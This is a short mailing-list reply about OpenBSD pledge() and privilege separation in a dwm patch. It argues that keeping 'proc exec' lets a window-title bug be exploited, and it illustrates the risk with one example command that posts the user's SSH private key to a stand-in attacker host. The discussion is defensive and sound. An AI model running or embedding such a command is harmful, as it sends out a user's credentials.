On Mon, 06 Jun 2016, Martin Kühne <mysat...@gmail.com> wrote:
> Can it somehow be made to keep its effect across the exec family of syscalls?
>
> cheers!
> mar77i
No. This is why pledging "stdio proc exec" is still quite dangerous. A well-designed program may try separating this functionality into a separate utility, or at least a different process.

For example, the latest version of my dwm patch uses "stdio rpath proc exec", which means, if e.g. there was a bug in window title handling, a potential attacker could exploit it to run something like "curl -d @.ssh/id_rsa http://evil.com/" or whatever else he needs to steal your laundry. Theoretically, such a bug could be exploited just by loading a web page or SSHing to a remote server - even if the web browser, the terminal emulator, the SSH client, were otherwise all secure.

But the only reason dwm needs proc and exec is so that it can spawn st, dmenu, etc. on a keypress. This functionality could be handled by a separate tool or a subprocess that doesn't need to process window titles. In such a case, the main dwm process could pledge to only use "stdio rpath".

Hope this clarifies everything!
<3,K.